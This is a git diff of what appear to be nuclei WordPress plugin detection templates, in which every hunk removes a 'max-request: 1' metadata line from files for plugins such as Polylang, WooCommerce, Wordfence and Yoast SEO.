a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - 